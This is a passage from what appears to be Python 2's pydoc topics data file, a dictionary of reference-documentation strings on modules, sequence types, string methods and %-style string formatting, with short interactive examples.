attribute " "'whoami'\n" " >>> c.method.im_func.whoami = 'my name is method'\n" ' >>> c.method.whoami\n' " 'my name is method'\n" '\n' 'See The standard type hierarchy for more information.\n', 'typesmodules': '\n' 'Modules\n' '*******\n' '\n' 'The only special operation on a module is attribute access: ' '"m.name",\n' 'where *m* is a module and *name* accesses a name defined in ' "*m*'s\n" 'symbol table. Module attributes can be assigned to. (Note ' 'that the\n' '"import" statement is not, strictly speaking, an operation ' 'on a module\n' 'object; "import foo" does not require a module object named ' '*foo* to\n' 'exist, rather it requires an (external) *definition* for a ' 'module\n' 'named *foo* somewhere.)\n' '\n' 'A special attribute of every module is "__dict__". This is ' 'the\n' "dictionary containing the module's symbol table. Modifying " 'this\n' "dictionary will actually change the module's symbol table, " 'but direct\n' 'assignment to the "__dict__" attribute is not possible (you ' 'can write\n' '"m.__dict__[\'a\'] = 1", which defines "m.a" to be "1", but ' "you can't\n" 'write "m.__dict__ = {}"). Modifying "__dict__" directly is ' 'not\n' 'recommended.\n' '\n' 'Modules built into the interpreter are written like this: ' '"<module\n' '\'sys\' (built-in)>". If loaded from a file, they are ' 'written as\n' '"<module \'os\' from ' '\'/usr/local/lib/pythonX.Y/os.pyc\'>".\n', 'typesseq': '\n' 'Sequence Types --- "str", "unicode", "list", "tuple", ' '"bytearray", "buffer", "xrange"\n' '*************************************************************************************\n' '\n' 'There are seven sequence types: strings, Unicode strings, ' 'lists,\n' 'tuples, bytearrays, buffers, and xrange objects.\n' '\n' 'For other containers see the built in "dict" and "set" classes, ' 'and\n' 'the "collections" module.\n' '\n' 'String literals are written in single or double quotes: ' '"\'xyzzy\'",\n' '""frobozz"". See String literals for more about string ' 'literals.\n' 'Unicode strings are much like strings, but are specified in the ' 'syntax\n' 'using a preceding "\'u\'" character: "u\'abc\'", "u"def"". In ' 'addition to\n' 'the functionality described here, there are also ' 'string-specific\n' 'methods described in the String Methods section. Lists are ' 'constructed\n' 'with square brackets, separating items with commas: "[a, b, ' 'c]".\n' 'Tuples are constructed by the comma operator (not within square\n' 'brackets), with or without enclosing parentheses, but an empty ' 'tuple\n' 'must have the enclosing parentheses, such as "a, b, c" or "()". ' 'A\n' 'single item tuple must have a trailing comma, such as "(d,)".\n' '\n' 'Bytearray objects are created with the built-in function\n' '"bytearray()".\n' '\n' 'Buffer objects are not directly supported by Python syntax, but ' 'can be\n' 'created by calling the built-in function "buffer()". They ' "don't\n" 'support concatenation or repetition.\n' '\n' 'Objects of type xrange are similar to buffers in that there is ' 'no\n' 'specific syntax to create them, but they are created using the\n' '"xrange()" function. They don\'t support slicing, concatenation ' 'or\n' 'repetition, and using "in", "not in", "min()" or "max()" on them ' 'is\n' 'inefficient.\n' '\n' 'Most sequence types support the following operations. The "in" ' 'and\n' '"not in" operations have the same priorities as the comparison\n' 'operations. The "+" and "*" operations have the same priority ' 'as the\n' 'corresponding numeric operations. [3] Additional methods are ' 'provided\n' 'for Mutable Sequence Types.\n' '\n' 'This table lists the sequence operations sorted in ascending ' 'priority.\n' 'In the table, *s* and *t* are sequences of the same type; *n*, ' '*i* and\n' '*j* are integers:\n' '\n' '+--------------------+----------------------------------+------------+\n' '| Operation | Result | ' 'Notes |\n' '+====================+==================================+============+\n' '| "x in s" | "True" if an item of *s* is | ' '(1) |\n' '| | equal to *x*, else "False" ' '| |\n' '+--------------------+----------------------------------+------------+\n' '| "x not in s" | "False" if an item of *s* is | ' '(1) |\n' '| | equal to *x*, else "True" ' '| |\n' '+--------------------+----------------------------------+------------+\n' '| "s + t" | the concatenation of *s* and *t* | ' '(6) |\n' '+--------------------+----------------------------------+------------+\n' '| "s * n, n * s" | equivalent to adding *s* to | ' '(2) |\n' '| | itself *n* times ' '| |\n' '+--------------------+----------------------------------+------------+\n' '| "s[i]" | *i*th item of *s*, origin 0 | ' '(3) |\n' '+--------------------+----------------------------------+------------+\n' '| "s[i:j]" | slice of *s* from *i* to *j* | ' '(3)(4) |\n' '+--------------------+----------------------------------+------------+\n' '| "s[i:j:k]" | slice of *s* from *i* to *j* | ' '(3)(5) |\n' '| | with step *k* ' '| |\n' '+--------------------+----------------------------------+------------+\n' '| "len(s)" | length of *s* ' '| |\n' '+--------------------+----------------------------------+------------+\n' '| "min(s)" | smallest item of *s* ' '| |\n' '+--------------------+----------------------------------+------------+\n' '| "max(s)" | largest item of *s* ' '| |\n' '+--------------------+----------------------------------+------------+\n' '| "s.index(x)" | index of the first occurrence of ' '| |\n' '| | *x* in *s* ' '| |\n' '+--------------------+----------------------------------+------------+\n' '| "s.count(x)" | total number of occurrences of ' '| |\n' '| | *x* in *s* ' '| |\n' '+--------------------+----------------------------------+------------+\n' '\n' 'Sequence types also support comparisons. In particular, tuples ' 'and\n' 'lists are compared lexicographically by comparing corresponding\n' 'elements. This means that to compare equal, every element must ' 'compare\n' 'equal and the two sequences must be of the same type and have ' 'the same\n' 'length. (For full details see Comparisons in the language ' 'reference.)\n' '\n' 'Notes:\n' '\n' '1. When *s* is a string or Unicode string object the "in" and ' '"not\n' ' in" operations act like a substring test. In Python ' 'versions\n' ' before 2.3, *x* had to be a string of length 1. In Python 2.3 ' 'and\n' ' beyond, *x* may be a string of any length.\n' '\n' '2. Values of *n* less than "0" are treated as "0" (which yields ' 'an\n' ' empty sequence of the same type as *s*). Note that items in ' 'the\n' ' sequence *s* are not copied; they are referenced multiple ' 'times.\n' ' This often haunts new Python programmers; consider:\n' '\n' ' >>> lists = [[]] * 3\n' ' >>> lists\n' ' [[], [], []]\n' ' >>> lists[0].append(3)\n' ' >>> lists\n' ' [[3], [3], [3]]\n' '\n' ' What has happened is that "[[]]" is a one-element list ' 'containing\n' ' an empty list, so all three elements of "[[]] * 3" are ' 'references\n' ' to this single empty list. Modifying any of the elements of\n' ' "lists" modifies this single list. You can create a list of\n' ' different lists this way:\n' '\n' ' >>> lists = [[] for i in range(3)]\n' ' >>> lists[0].append(3)\n' ' >>> lists[1].append(5)\n' ' >>> lists[2].append(7)\n' ' >>> lists\n' ' [[3], [5], [7]]\n' '\n' ' Further explanation is available in the FAQ entry How do I ' 'create a\n' ' multidimensional list?.\n' '\n' '3. If *i* or *j* is negative, the index is relative to the end ' 'of\n' ' the string: "len(s) + i" or "len(s) + j" is substituted. But ' 'note\n' ' that "-0" is still "0".\n' '\n' '4. The slice of *s* from *i* to *j* is defined as the sequence ' 'of\n' ' items with index *k* such that "i <= k < j". If *i* or *j* ' 'is\n' ' greater than "len(s)", use "len(s)". If *i* is omitted or ' '"None",\n' ' use "0". If *j* is omitted or "None", use "len(s)". If *i* ' 'is\n' ' greater than or equal to *j*, the slice is empty.\n' '\n' '5. The slice of *s* from *i* to *j* with step *k* is defined as ' 'the\n' ' sequence of items with index "x = i + n*k" such that "0 <= n ' '<\n' ' (j-i)/k". In other words, the indices are "i", "i+k", ' '"i+2*k",\n' ' "i+3*k" and so on, stopping when *j* is reached (but never\n' ' including *j*). If *i* or *j* is greater than "len(s)", use\n' ' "len(s)". If *i* or *j* are omitted or "None", they become ' '"end"\n' ' values (which end depends on the sign of *k*). Note, *k* ' 'cannot be\n' ' zero. If *k* is "None", it is treated like "1".\n' '\n' '6. **CPython implementation detail:** If *s* and *t* are both\n' ' strings, some Python implementations such as CPython can ' 'usually\n' ' perform an in-place optimization for assignments of the form ' '"s = s\n' ' + t" or "s += t". When applicable, this optimization makes\n' ' quadratic run-time much less likely. This optimization is ' 'both\n' ' version and implementation dependent. For performance ' 'sensitive\n' ' code, it is preferable to use the "str.join()" method which ' 'assures\n' ' consistent linear concatenation performance across versions ' 'and\n' ' implementations.\n' '\n' ' Changed in version 2.4: Formerly, string concatenation never\n' ' occurred in-place.\n' '\n' '\n' 'String Methods\n' '==============\n' '\n' 'Below are listed the string methods which both 8-bit strings ' 'and\n' 'Unicode objects support. Some of them are also available on\n' '"bytearray" objects.\n' '\n' "In addition, Python's strings support the sequence type methods\n" 'described in the Sequence Types --- str, unicode, list, tuple,\n' 'bytearray, buffer, xrange section. To output formatted strings ' 'use\n' 'template strings or the "%" operator described in the String\n' 'Formatting Operations section. Also, see the "re" module for ' 'string\n' 'functions based on regular expressions.\n' '\n' 'str.capitalize()\n' '\n' ' Return a copy of the string with its first character ' 'capitalized\n' ' and the rest lowercased.\n' '\n' ' For 8-bit strings, this method is locale-dependent.\n' '\n' 'str.center(width[, fillchar])\n' '\n' ' Return centered in a string of length *width*. Padding is ' 'done\n' ' using the specified *fillchar* (default is a space).\n' '\n' ' Changed in version 2.4: Support for the *fillchar* argument.\n' '\n' 'str.count(sub[, start[, end]])\n' '\n' ' Return the number of non-overlapping occurrences of substring ' '*sub*\n' ' in the range [*start*, *end*]. Optional arguments *start* ' 'and\n' ' *end* are interpreted as in slice notation.\n' '\n' 'str.decode([encoding[, errors]])\n' '\n' ' Decodes the string using the codec registered for ' '*encoding*.\n' ' *encoding* defaults to the default string encoding. *errors* ' 'may\n' ' be given to set a different error handling scheme. The ' 'default is\n' ' "\'strict\'", meaning that encoding errors raise ' '"UnicodeError".\n' ' Other possible values are "\'ignore\'", "\'replace\'" and any ' 'other\n' ' name registered via "codecs.register_error()", see section ' 'Codec\n' ' Base Classes.\n' '\n' ' New in version 2.2.\n' '\n' ' Changed in version 2.3: Support for other error handling ' 'schemes\n' ' added.\n' '\n' ' Changed in version 2.7: Support for keyword arguments added.\n' '\n' 'str.encode([encoding[, errors]])\n' '\n' ' Return an encoded version of the string. Default encoding is ' 'the\n' ' current default string encoding. *errors* may be given to ' 'set a\n' ' different error handling scheme. The default for *errors* ' 'is\n' ' "\'strict\'", meaning that encoding errors raise a ' '"UnicodeError".\n' ' Other possible values are "\'ignore\'", "\'replace\'",\n' ' "\'xmlcharrefreplace\'", "\'backslashreplace\'" and any other ' 'name\n' ' registered via "codecs.register_error()", see section Codec ' 'Base\n' ' Classes. For a list of possible encodings, see section ' 'Standard\n' ' Encodings.\n' '\n' ' New in version 2.0.\n' '\n' ' Changed in version 2.3: Support for "\'xmlcharrefreplace\'" ' 'and\n' ' "\'backslashreplace\'" and other error handling schemes ' 'added.\n' '\n' ' Changed in version 2.7: Support for keyword arguments added.\n' '\n' 'str.endswith(suffix[, start[, end]])\n' '\n' ' Return "True" if the string ends with the specified ' '*suffix*,\n' ' otherwise return "False". *suffix* can also be a tuple of ' 'suffixes\n' ' to look for. With optional *start*, test beginning at that\n' ' position. With optional *end*, stop comparing at that ' 'position.\n' '\n' ' Changed in version 2.5: Accept tuples as *suffix*.\n' '\n' 'str.expandtabs([tabsize])\n' '\n' ' Return a copy of the string where all tab characters are ' 'replaced\n' ' by one or more spaces, depending on the current column and ' 'the\n' ' given tab size. Tab positions occur every *tabsize* ' 'characters\n' ' (default is 8, giving tab positions at columns 0, 8, 16 and ' 'so on).\n' ' To expand the string, the current column is set to zero and ' 'the\n' ' string is examined character by character. If the character ' 'is a\n' ' tab ("\\t"), one or more space characters are inserted in the ' 'result\n' ' until the current column is equal to the next tab position. ' '(The\n' ' tab character itself is not copied.) If the character is a ' 'newline\n' ' ("\\n") or return ("\\r"), it is copied and the current ' 'column is\n' ' reset to zero. Any other character is copied unchanged and ' 'the\n' ' current column is incremented by one regardless of how the\n' ' character is represented when printed.\n' '\n' " >>> '01\\t012\\t0123\\t01234'.expandtabs()\n" " '01 012 0123 01234'\n" " >>> '01\\t012\\t0123\\t01234'.expandtabs(4)\n" " '01 012 0123 01234'\n" '\n' 'str.find(sub[, start[, end]])\n' '\n' ' Return the lowest index in the string where substring *sub* ' 'is\n' ' found within the slice "s[start:end]". Optional arguments ' '*start*\n' ' and *end* are interpreted as in slice notation. Return "-1" ' 'if\n' ' *sub* is not found.\n' '\n' ' Note: The "find()" method should be used only if you need to ' 'know\n' ' the position of *sub*. To check if *sub* is a substring or ' 'not,\n' ' use the "in" operator:\n' '\n' " >>> 'Py' in 'Python'\n" ' True\n' '\n' 'str.format(*args, **kwargs)\n' '\n' ' Perform a string formatting operation. The string on which ' 'this\n' ' method is called can contain literal text or replacement ' 'fields\n' ' delimited by braces "{}". Each replacement field contains ' 'either\n' ' the numeric index of a positional argument, or the name of a\n' ' keyword argument. Returns a copy of the string where each\n' ' replacement field is replaced with the string value of the\n' ' corresponding argument.\n' '\n' ' >>> "The sum of 1 + 2 is {0}".format(1+2)\n' " 'The sum of 1 + 2 is 3'\n" '\n' ' See Format String Syntax for a description of the various\n' ' formatting options that can be specified in format strings.\n' '\n' ' This method of string formatting is the new standard in ' 'Python 3,\n' ' and should be preferred to the "%" formatting described in ' 'String\n' ' Formatting Operations in new code.\n' '\n' ' New in version 2.6.\n' '\n' 'str.index(sub[, start[, end]])\n' '\n' ' Like "find()", but raise "ValueError" when the substring is ' 'not\n' ' found.\n' '\n' 'str.isalnum()\n' '\n' ' Return true if all characters in the string are alphanumeric ' 'and\n' ' there is at least one character, false otherwise.\n' '\n' ' For 8-bit strings, this method is locale-dependent.\n' '\n' 'str.isalpha()\n' '\n' ' Return true if all characters in the string are alphabetic ' 'and\n' ' there is at least one character, false otherwise.\n' '\n' ' For 8-bit strings, this method is locale-dependent.\n' '\n' 'str.isdigit()\n' '\n' ' Return true if all characters in the string are digits and ' 'there is\n' ' at least one character, false otherwise.\n' '\n' ' For 8-bit strings, this method is locale-dependent.\n' '\n' 'str.islower()\n' '\n' ' Return true if all cased characters [4] in the string are ' 'lowercase\n' ' and there is at least one cased character, false otherwise.\n' '\n' ' For 8-bit strings, this method is locale-dependent.\n' '\n' 'str.isspace()\n' '\n' ' Return true if there are only whitespace characters in the ' 'string\n' ' and there is at least one character, false otherwise.\n' '\n' ' For 8-bit strings, this method is locale-dependent.\n' '\n' 'str.istitle()\n' '\n' ' Return true if the string is a titlecased string and there is ' 'at\n' ' least one character, for example uppercase characters may ' 'only\n' ' follow uncased characters and lowercase characters only cased ' 'ones.\n' ' Return false otherwise.\n' '\n' ' For 8-bit strings, this method is locale-dependent.\n' '\n' 'str.isupper()\n' '\n' ' Return true if all cased characters [4] in the string are ' 'uppercase\n' ' and there is at least one cased character, false otherwise.\n' '\n' ' For 8-bit strings, this method is locale-dependent.\n' '\n' 'str.join(iterable)\n' '\n' ' Return a string which is the concatenation of the strings in ' 'the\n' ' *iterable* *iterable*. The separator between elements is ' 'the\n' ' string providing this method.\n' '\n' 'str.ljust(width[, fillchar])\n' '\n' ' Return the string left justified in a string of length ' '*width*.\n' ' Padding is done using the specified *fillchar* (default is a\n' ' space). The original string is returned if *width* is less ' 'than or\n' ' equal to "len(s)".\n' '\n' ' Changed in version 2.4: Support for the *fillchar* argument.\n' '\n' 'str.lower()\n' '\n' ' Return a copy of the string with all the cased characters ' '[4]\n' ' converted to lowercase.\n' '\n' ' For 8-bit strings, this method is locale-dependent.\n' '\n' 'str.lstrip([chars])\n' '\n' ' Return a copy of the string with leading characters removed. ' 'The\n' ' *chars* argument is a string specifying the set of characters ' 'to be\n' ' removed. If omitted or "None", the *chars* argument defaults ' 'to\n' ' removing whitespace. The *chars* argument is not a prefix; ' 'rather,\n' ' all combinations of its values are stripped:\n' '\n' " >>> ' spacious '.lstrip()\n" " 'spacious '\n" " >>> 'www.example.com'.lstrip('cmowz.')\n" " 'example.com'\n" '\n' ' Changed in version 2.2.2: Support for the *chars* argument.\n' '\n' 'str.partition(sep)\n' '\n' ' Split the string at the first occurrence of *sep*, and return ' 'a\n' ' 3-tuple containing the part before the separator, the ' 'separator\n' ' itself, and the part after the separator. If the separator ' 'is not\n' ' found, return a 3-tuple containing the string itself, ' 'followed by\n' ' two empty strings.\n' '\n' ' New in version 2.5.\n' '\n' 'str.replace(old, new[, count])\n' '\n' ' Return a copy of the string with all occurrences of substring ' '*old*\n' ' replaced by *new*. If the optional argument *count* is ' 'given, only\n' ' the first *count* occurrences are replaced.\n' '\n' 'str.rfind(sub[, start[, end]])\n' '\n' ' Return the highest index in the string where substring *sub* ' 'is\n' ' found, such that *sub* is contained within "s[start:end]".\n' ' Optional arguments *start* and *end* are interpreted as in ' 'slice\n' ' notation. Return "-1" on failure.\n' '\n' 'str.rindex(sub[, start[, end]])\n' '\n' ' Like "rfind()" but raises "ValueError" when the substring ' '*sub* is\n' ' not found.\n' '\n' 'str.rjust(width[, fillchar])\n' '\n' ' Return the string right justified in a string of length ' '*width*.\n' ' Padding is done using the specified *fillchar* (default is a\n' ' space). The original string is returned if *width* is less ' 'than or\n' ' equal to "len(s)".\n' '\n' ' Changed in version 2.4: Support for the *fillchar* argument.\n' '\n' 'str.rpartition(sep)\n' '\n' ' Split the string at the last occurrence of *sep*, and return ' 'a\n' ' 3-tuple containing the part before the separator, the ' 'separator\n' ' itself, and the part after the separator. If the separator ' 'is not\n' ' found, return a 3-tuple containing two empty strings, ' 'followed by\n' ' the string itself.\n' '\n' ' New in version 2.5.\n' '\n' 'str.rsplit([sep[, maxsplit]])\n' '\n' ' Return a list of the words in the string, using *sep* as the\n' ' delimiter string. If *maxsplit* is given, at most *maxsplit* ' 'splits\n' ' are done, the *rightmost* ones. If *sep* is not specified ' 'or\n' ' "None", any whitespace string is a separator. Except for ' 'splitting\n' ' from the right, "rsplit()" behaves like "split()" which is\n' ' described in detail below.\n' '\n' ' New in version 2.4.\n' '\n' 'str.rstrip([chars])\n' '\n' ' Return a copy of the string with trailing characters ' 'removed. The\n' ' *chars* argument is a string specifying the set of characters ' 'to be\n' ' removed. If omitted or "None", the *chars* argument defaults ' 'to\n' ' removing whitespace. The *chars* argument is not a suffix; ' 'rather,\n' ' all combinations of its values are stripped:\n' '\n' " >>> ' spacious '.rstrip()\n" " ' spacious'\n" " >>> 'mississippi'.rstrip('ipz')\n" " 'mississ'\n" '\n' ' Changed in version 2.2.2: Support for the *chars* argument.\n' '\n' 'str.split([sep[, maxsplit]])\n' '\n' ' Return a list of the words in the string, using *sep* as the\n' ' delimiter string. If *maxsplit* is given, at most ' '*maxsplit*\n' ' splits are done (thus, the list will have at most ' '"maxsplit+1"\n' ' elements). If *maxsplit* is not specified or "-1", then ' 'there is\n' ' no limit on the number of splits (all possible splits are ' 'made).\n' '\n' ' If *sep* is given, consecutive delimiters are not grouped ' 'together\n' ' and are deemed to delimit empty strings (for example,\n' ' "\'1,,2\'.split(\',\')" returns "[\'1\', \'\', \'2\']"). The ' '*sep* argument\n' ' may consist of multiple characters (for example,\n' ' "\'1<>2<>3\'.split(\'<>\')" returns "[\'1\', \'2\', \'3\']"). ' 'Splitting an\n' ' empty string with a specified separator returns "[\'\']".\n' '\n' ' If *sep* is not specified or is "None", a different ' 'splitting\n' ' algorithm is applied: runs of consecutive whitespace are ' 'regarded\n' ' as a single separator, and the result will contain no empty ' 'strings\n' ' at the start or end if the string has leading or trailing\n' ' whitespace. Consequently, splitting an empty string or a ' 'string\n' ' consisting of just whitespace with a "None" separator returns ' '"[]".\n' '\n' ' For example, "\' 1 2 3 \'.split()" returns "[\'1\', ' '\'2\', \'3\']", and\n' ' "\' 1 2 3 \'.split(None, 1)" returns "[\'1\', \'2 3 ' '\']".\n' '\n' 'str.splitlines([keepends])\n' '\n' ' Return a list of the lines in the string, breaking at line\n' ' boundaries. This method uses the *universal newlines* ' 'approach to\n' ' splitting lines. Line breaks are not included in the ' 'resulting list\n' ' unless *keepends* is given and true.\n' '\n' ' For example, "\'ab c\\n\\nde fg\\rkl\\r\\n\'.splitlines()" ' 'returns "[\'ab\n' ' c\', \'\', \'de fg\', \'kl\']", while the same call with\n' ' "splitlines(True)" returns "[\'ab c\\n\', \'\\n\', \'de ' 'fg\\r\', \'kl\\r\\n\']".\n' '\n' ' Unlike "split()" when a delimiter string *sep* is given, ' 'this\n' ' method returns an empty list for the empty string, and a ' 'terminal\n' ' line break does not result in an extra line.\n' '\n' 'str.startswith(prefix[, start[, end]])\n' '\n' ' Return "True" if string starts with the *prefix*, otherwise ' 'return\n' ' "False". *prefix* can also be a tuple of prefixes to look ' 'for.\n' ' With optional *start*, test string beginning at that ' 'position.\n' ' With optional *end*, stop comparing string at that position.\n' '\n' ' Changed in version 2.5: Accept tuples as *prefix*.\n' '\n' 'str.strip([chars])\n' '\n' ' Return a copy of the string with the leading and trailing\n' ' characters removed. The *chars* argument is a string ' 'specifying the\n' ' set of characters to be removed. If omitted or "None", the ' '*chars*\n' ' argument defaults to removing whitespace. The *chars* ' 'argument is\n' ' not a prefix or suffix; rather, all combinations of its ' 'values are\n' ' stripped:\n' '\n' " >>> ' spacious '.strip()\n" " 'spacious'\n" " >>> 'www.example.com'.strip('cmowz.')\n" " 'example'\n" '\n' ' Changed in version 2.2.2: Support for the *chars* argument.\n' '\n' 'str.swapcase()\n' '\n' ' Return a copy of the string with uppercase characters ' 'converted to\n' ' lowercase and vice versa.\n' '\n' ' For 8-bit strings, this method is locale-dependent.\n' '\n' 'str.title()\n' '\n' ' Return a titlecased version of the string where words start ' 'with an\n' ' uppercase character and the remaining characters are ' 'lowercase.\n' '\n' ' The algorithm uses a simple language-independent definition ' 'of a\n' ' word as groups of consecutive letters. The definition works ' 'in\n' ' many contexts but it means that apostrophes in contractions ' 'and\n' ' possessives form word boundaries, which may not be the ' 'desired\n' ' result:\n' '\n' ' >>> "they\'re bill\'s friends from the UK".title()\n' ' "They\'Re Bill\'S Friends From The Uk"\n' '\n' ' A workaround for apostrophes can be constructed using ' 'regular\n' ' expressions:\n' '\n' ' >>> import re\n' ' >>> def titlecase(s):\n' ' ... return re.sub(r"[A-Za-z]+(\'[A-Za-z]+)?",\n' ' ... lambda mo: mo.group(0)[0].upper() +\n' ' ... mo.group(0)[1:].lower(),\n' ' ... s)\n' ' ...\n' ' >>> titlecase("they\'re bill\'s friends.")\n' ' "They\'re Bill\'s Friends."\n' '\n' ' For 8-bit strings, this method is locale-dependent.\n' '\n' 'str.translate(table[, deletechars])\n' '\n' ' Return a copy of the string where all characters occurring in ' 'the\n' ' optional argument *deletechars* are removed, and the ' 'remaining\n' ' characters have been mapped through the given translation ' 'table,\n' ' which must be a string of length 256.\n' '\n' ' You can use the "maketrans()" helper function in the ' '"string"\n' ' module to create a translation table. For string objects, set ' 'the\n' ' *table* argument to "None" for translations that only delete\n' ' characters:\n' '\n' " >>> 'read this short text'.translate(None, 'aeiou')\n" " 'rd ths shrt txt'\n" '\n' ' New in version 2.6: Support for a "None" *table* argument.\n' '\n' ' For Unicode objects, the "translate()" method does not accept ' 'the\n' ' optional *deletechars* argument. Instead, it returns a copy ' 'of the\n' ' *s* where all characters have been mapped through the given\n' ' translation table which must be a mapping of Unicode ordinals ' 'to\n' ' Unicode ordinals, Unicode strings or "None". Unmapped ' 'characters\n' ' are left untouched. Characters mapped to "None" are deleted. ' 'Note,\n' ' a more flexible approach is to create a custom character ' 'mapping\n' ' codec using the "codecs" module (see "encodings.cp1251" for ' 'an\n' ' example).\n' '\n' 'str.upper()\n' '\n' ' Return a copy of the string with all the cased characters ' '[4]\n' ' converted to uppercase. Note that "str.upper().isupper()" ' 'might be\n' ' "False" if "s" contains uncased characters or if the Unicode\n' ' category of the resulting character(s) is not "Lu" (Letter,\n' ' uppercase), but e.g. "Lt" (Letter, titlecase).\n' '\n' ' For 8-bit strings, this method is locale-dependent.\n' '\n' 'str.zfill(width)\n' '\n' ' Return the numeric string left filled with zeros in a string ' 'of\n' ' length *width*. A sign prefix is handled correctly. The ' 'original\n' ' string is returned if *width* is less than or equal to ' '"len(s)".\n' '\n' ' New in version 2.2.2.\n' '\n' 'The following methods are present only on unicode objects:\n' '\n' 'unicode.isnumeric()\n' '\n' ' Return "True" if there are only numeric characters in S, ' '"False"\n' ' otherwise. Numeric characters include digit characters, and ' 'all\n' ' characters that have the Unicode numeric value property, ' 'e.g.\n' ' U+2155, VULGAR FRACTION ONE FIFTH.\n' '\n' 'unicode.isdecimal()\n' '\n' ' Return "True" if there are only decimal characters in S, ' '"False"\n' ' otherwise. Decimal characters include digit characters, and ' 'all\n' ' characters that can be used to form decimal-radix numbers, ' 'e.g.\n' ' U+0660, ARABIC-INDIC DIGIT ZERO.\n' '\n' '\n' 'String Formatting Operations\n' '============================\n' '\n' 'String and Unicode objects have one unique built-in operation: ' 'the "%"\n' 'operator (modulo). This is also known as the string ' '*formatting* or\n' '*interpolation* operator. Given "format % values" (where ' '*format* is\n' 'a string or Unicode object), "%" conversion specifications in ' '*format*\n' 'are replaced with zero or more elements of *values*. The effect ' 'is\n' 'similar to the using "sprintf()" in the C language. If *format* ' 'is a\n' 'Unicode object, or if any of the objects being converted using ' 'the\n' '"%s" conversion are Unicode objects, the result will also be a ' 'Unicode\n' 'object.\n' '\n' 'If *format* requires a single argument, *values* may be a single ' 'non-\n' 'tuple object. [5] Otherwise, *values* must be a tuple with ' 'exactly\n' 'the number of items specified by the format string, or a single\n' 'mapping object (for example, a dictionary).\n' '\n' 'A conversion specifier contains two or more characters and has ' 'the\n' 'following components, which must occur in this order:\n' '\n' '1. The "\'%\'" character, which marks the start of the ' 'specifier.\n' '\n' '2. Mapping key (optional), consisting of a parenthesised ' 'sequence\n' ' of characters (for example, "(somename)").\n' '\n' '3. Conversion flags (optional), which affect the result of some\n' ' conversion types.\n' '\n' '4. Minimum field width (optional). If specified as an "\'*\'"\n' ' (asterisk), the actual width is read from the next element of ' 'the\n' ' tuple in *values*, and the object to convert comes after the\n' ' minimum field width and optional precision.\n' '\n' '5. Precision (optional), given as a "\'.\'" (dot) followed by ' 'the\n' ' precision. If specified as "\'*\'" (an asterisk), the actual ' 'width\n' ' is read from the next element of the tuple in *values*, and ' 'the\n' ' value to convert comes after the precision.\n' '\n' '6. Length modifier (optional).\n' '\n' '7. Conversion type.\n' '\n' 'When the right argument is a dictionary (or other mapping type), ' 'then\n' 'the formats in the string *must* include a parenthesised mapping ' 'key\n' 'into that dictionary inserted immediately after the "\'%\'" ' 'character.\n' 'The mapping key selects the value to be formatted from the ' 'mapping.\n' 'For example:\n' '\n' ">>> print '%(language)s has %(number)03d quote types.' % \\\n" '... {"language": "Python", "number": 2}\n' 'Python has 002 quote types.\n' '\n' 'In this case no "*" specifiers may occur in a format (since ' 'they\n' 'require a sequential parameter list).\n' '\n' 'The conversion flag characters are:\n' '\n' '+-----------+-----------------------------------------------------------------------+\n' '| Flag | ' 'Meaning ' '|\n' '+===========+=======================================================================+\n' '| "\'#\'" | The value conversion will use the "alternate ' 'form" (where defined |\n' '| | ' 'below). ' '|\n' '+-----------+-----------------------------------------------------------------------+\n' '| "\'0\'" | The conversion will be zero padded for numeric ' 'values. |\n' '+-----------+-----------------------------------------------------------------------+\n' '| "\'-\'" | The converted value is left adjusted (overrides ' 'the "\'0\'" conversion |\n' '| | if both are ' 'given). |\n' '+-----------+-----------------------------------------------------------------------+\n' '| "\' \'" | (a space) A blank should be left before a ' 'positive number (or empty |\n' '| | string) produced by a signed ' 'conversion. |\n' '+-----------+-----------------------------------------------------------------------+\n' '| "\'+\'" | A sign character ("\'+\'" or "\'-\'") will ' 'precede the conversion |\n' '| | (overrides a "space" ' 'flag). |\n' '+-----------+-----------------------------------------------------------------------+\n' '\n' 'A length modifier ("h", "l", or "L") may be present, but is ' 'ignored as\n' 'it is not necessary for Python -- so e.g. "%ld" is identical to ' '"%d".\n' '\n' 'The conversion types are:\n' '\n' '+--------------+-------------------------------------------------------+---------+\n' '| Conversion | ' 'Meaning | Notes ' '|\n' '+==============+=======================================================+=========+\n' '| "\'d\'" | Signed integer ' 'decimal. | |\n' '+--------------+-------------------------------------------------------+---------+\n' '| "\'i\'" | Signed integer ' 'decimal. | |\n' '+--------------+-------------------------------------------------------+---------+\n' '| "\'o\'" | Signed octal ' 'value. | (1) |\n' '+--------------+-------------------------------------------------------+---------+\n' '| "\'u\'" | Obsolete type -- it is identical to ' '"\'d\'". | (7) |\n' '+--------------+-------------------------------------------------------+---------+\n' '| "\'x\'" | Signed hexadecimal ' '(lowercase). | (2) |\n' '+--------------+-------------------------------------------------------+---------+\n' '| "\'X\'" | Signed hexadecimal ' '(uppercase). | (2) |\n' '+--------------+-------------------------------------------------------+---------+\n' '| "\'e\'" | Floating point exponential format ' '(lowercase). | (3) |\n' '+--------------+-------------------------------------------------------+---------+\n' '| "\'E\'" | Floating point exponential format ' '(uppercase). | (3) |\n' '+--------------+-------------------------------------------------------+---------+\n' '| "\'f\'" | Floating point decimal ' 'format. | (3) |\n' '+--------------+-------------------------------------------------------+---------+\n' '| "\'F\'" | Floating point decimal ' 'format. | (3) |\n' '+--------------+-------------------------------------------------------+---------+\n' '| "\'g\'" | Floating point format. Uses lowercase ' 'exponential | (4) |\n' '| | format if exponent is less than -4 or not less ' 'than | |\n' '| | precision, decimal format ' 'otherwise. | |\n' '+--------------+-------------------------------------------------------+---------+\n' '| "\'G\'" | Floating point format. Uses uppercase ' 'exponential | (4) |\n' '| | format if exponent is less than -4 or not less ' 'than | |\n' '| | precision, decimal format ' 'otherwise. | |\n' '+--------------+-------------------------------------------------------+---------+\n' '| "\'c\'" | Single character (accepts integer or single ' 'character | |\n' '| | ' 'string). | ' '|\n' '+--------------+-------------------------------------------------------+---------+\n' '| "\'r\'" | String (converts any Python object using ' 'repr()). | (5) |\n' '+--------------+-------------------------------------------------------+---------+\n' '| "\'s\'" | String (converts any Python object using ' '"str()"). | (6) |\n' '+--------------+-------------------------------------------------------+---------+\n' '| "\'%\'" | No argument is converted, results in a ' '"\'%\'" | |\n' '| | character in the ' 'result. | |\n' '+--------------+-------------------------------------------------------+---------+\n' '\n' 'Notes:\n' '\n' '1. The alternate form causes a leading zero ("\'0\'") to be ' 'inserted\n' ' between left-hand padding and the formatting of the number if ' 'the\n' ' leading character of the result is not already a zero.\n' '\n' '2. The alternate form causes a leading "\'0x\'" or "\'0X\'" ' '(depending\n' ' on whether the "\'x\'" or "\'X\'" format was used) to be ' 'inserted\n' ' between left-hand padding and the formatting of the number if 